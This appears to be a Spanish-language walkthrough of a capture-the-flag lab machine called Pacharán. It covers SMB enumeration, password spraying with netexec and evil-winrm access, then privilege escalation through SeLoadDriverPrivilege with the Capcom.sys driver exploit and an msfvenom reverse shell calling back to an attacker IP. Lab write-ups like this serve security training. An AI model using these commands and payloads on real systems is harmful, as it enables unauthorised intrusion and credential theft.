Pacharán

Hacemos un escaneo superficial para ver los puertos abiertos:

Un escaneo mas exhaustivo solo en los puertos abiertos:

Viendo el servicio smb abierto verificamos los archivos compartidos:

Al ver que tenemos lectura a NETLOGON2 entramos ver lo que contiene:

smbclient //192.168.1.42/NETLOGON2  -N

Adentro se encontró:

Clave?

Comprobamos que el nombre del archivo Orujo es un user, además tenemos la contraseña así que verificamos sus recursos compartidos de igual manera:

Tenemos para leer "PACHARAN"

smbclient  -U Orujo //192.168.1.42/NETLOGON

Se encontró posibles usuarios o contraseñas intentemos averiguar:

Asi que con el mismo usuario y contraseña con rpclient enumeramos usuarios.

rpcclient -U 'Orujo' 192.168.1.42

rpcclient $> enumdomusers
user:[Administrador] rid:[0x1f4]
user:[Invitado] rid:[0x1f5]
user:[krbtgt] rid:[0x1f6]
user:[DefaultAccount] rid:[0x1f7]
user:[Orujo] rid:[0x44f]
user:[Ginebra] rid:[0x450]
user:[Whisky] rid:[0x452]
user:[Hendrick] rid:[0x453]
user:[Chivas Regal] rid:[0x454]
user:[Whisky2] rid:[0x457]
user:[JB] rid:[0x458]
user:[Chivas] rid:[0x459]
user:[beefeater] rid:[0x45a]
user:[CarlosV] rid:[0x45b]
user:[RedLabel] rid:[0x45c]
user:[Gordons] rid:[0x45d]

• Los vamos a meter en una lista.

• Y con netexec vamos a ver que credenciales coinciden mediante smb.

❯ netexec smb 192.168.1.42 -u users.txt -p ah.txt

Y si hubo una correcta entre todas:

Whisky:MamasoyStream2er@

Obtennos un usuario y contraseña y volvemos a enumerar con rpclient:

rpcclient -U 'Whisky' 192.168.1.42     

Al enumerar se encontró con el comando enumprinters una credencial:

rpcclient $> enumprinters
        flags:[0x800000]
        name:[\\192.168.1.42\Soy Hacker y arreglo impresoras]
        description:[\\192.168.1.42\Soy Hacker y arreglo impresoras,Universal Document Converter,TurkisArrusPuchuchuSiu1]
        comment:[Soy Hacker y arreglo impresoras]

Nuevamente utilizamos netexec para ver con que usuario de los que enumeramos anteriormente funcionan con esta contraseña, pero esta vez por winrm.

netexec winrm 192.168.1.42 -u users.txt -p 'TurkisArrusPuchuchuSiu1'

Se encontro un usuario valido:

  arc4 = algorithms.ARC4(self._key)
WINRM       192.168.1.42    5985   WIN-VRU3GG3DPLJ  [+] PACHARAN.THL\Chivas Regal:TurkisArrusPuchuchuSiu1 (Pwn3d!)

SeLoadDriverPrivilege,

Entramos por winrm y vemos que tenemos el permiso SeLoadDriverPrivilege, el cual tenemos la explicación de dicho privilegio en este articulo.

❯ evil-winrm -i 192.168.1.42  -u 'Chivas regal' -p  'TurkisArrusPuchuchuSiu1'

Nos vamos a crear una carpeta temporal y subiremos los exploit que tenemos para abusar de dicho privilegio.

Descargamos los archivos a la maquina victima:

upload LoadDriver.exe ....

C:\temp> .\ExploitCapcom.exe LOAD C:\Temp\Capcom.sys

Al ejecutar este comando nos tiene que salir: NTSTATUS: 00000000

[*] Service Name: kqyumyoz
[+] Enabling SeLoadDriverPrivilege
[+] SeLoadDriverPrivilege Enabled
[+] Loading Driver: \Registry\User\S-1-5-21-3046175042-3013395696-775018414-1108\???????????????????
NTSTATUS: 00000000, WinError: 0

Después de cargar exitosamente Capcom.sys ahora podemos ejecutar cualquier comando como usuario privilegiado con la palabra clave EXPLOIT.

Pero lo haremos con una reverse shell para tener todo mas dinamico:

msfvenom -p windows/x64/shell_reverse_tcp LHOST=192.168.1.34  LPORT=4444 -f exe -o rev.exe

Lo subimos a la maquina victima y con el comando:

.\ExploitCapcom.exe EXPLOIT rev.exe

Nos regresa la conexión, estando en la escucha en el puerto dado por el .exe: